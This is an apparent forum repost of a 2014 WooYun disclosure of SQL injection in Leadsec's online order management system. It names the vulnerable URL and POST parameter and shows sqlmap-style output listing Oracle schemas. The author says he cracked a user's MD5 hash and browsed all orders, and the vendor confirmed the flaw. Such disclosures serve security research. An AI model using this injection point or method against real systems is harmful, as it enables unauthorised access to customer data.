发新话题
打印

网御星云电子订单管理系统爆出SQL注入Oracle数据库

网御星云电子订单管理系统爆出SQL注入Oracle数据库

漏洞概要
缺陷编号:        WooYun-2014-67456
漏洞标题:        网御星云第二集某重要业务系统爆出SQL注入Oracle数据库订单信息
相关厂商:        leadsec.com.cn
漏洞作者:        小螺号
提交时间:        2014-07-10 15:18
公开时间:        2014-10-08 15:20
漏洞类型:        SQL注射漏洞
危害等级:        高
自评Rank:        15
漏洞状态:        厂商已经确认
漏洞来源:        http://www.wooyun.org
Tags标签:       sql注入 网御 安全厂商 没有安全意识

漏洞详情披露状态:
2014-07-10:        细节已通知厂商并且等待厂商处理中
2014-07-11:        厂商已经确认,细节仅向厂商公开
2014-07-14:        细节向第三方安全合作伙伴开放
2014-07-21:        细节向核心白帽子及相关领域专家公开
2014-07-31:        细节向普通白帽子公开
2014-08-20:        细节向实习白帽子公开
2014-10-08:        细节向公众公开

简要描述:网御星云--一个不安全的安全厂商
详细说明:网御星云的电子订单管理系统,可以爆sql注入。ORACLE数据库成功列出,随便找了个用户,破了md5加密,进入订单系统,所有订单一览无余。想问问你们,这个真的不重要吗,安全厂商……………………



给你看注入点:

http://agent.leadsec.com.cn/agent/countryProvinceChange.htm?currTime=Tue%20Jul%2001%202014%2009:15:09%20GMT+0800



POST参数:province=11

漏洞证明:Place: POST

Parameter: province

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: province=11。。。


...

---

[09:21:53] [INFO] the back-end DBMS is Oracle

web application technology: Nginx, JSP

back-end DBMS: Oracle





>>>>>>>>>>>>>>>>>>>DATABASES>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

CTXSYS

DBSNMP

EC_LEADSEC

EC_VENUS

EXFSYS

FLOWS_030000

FLOWS_FILES

HR

IX

MDSYS

OE

OLAPSYS

ORDSYS

OUTLN

PM

SCOTT

SH

SOAU

SPPROD

SYS

SYSMAN

SYSTEM

TSMSYS

WK_TEST

WKSYS

WMSYS

XDB










修复方案:你们是安全厂商呀。
版权声明:转载请注明来源 小螺号@乌云

漏洞回应
厂商回应:
危害等级:中

漏洞Rank:8


确认时间:2014-07-11 12:04

厂商回复:谢谢发现问题
最新状态:暂无

原文:http://www.wooyun.org/bugs/wooyun-2010-067456

TOP

发新话题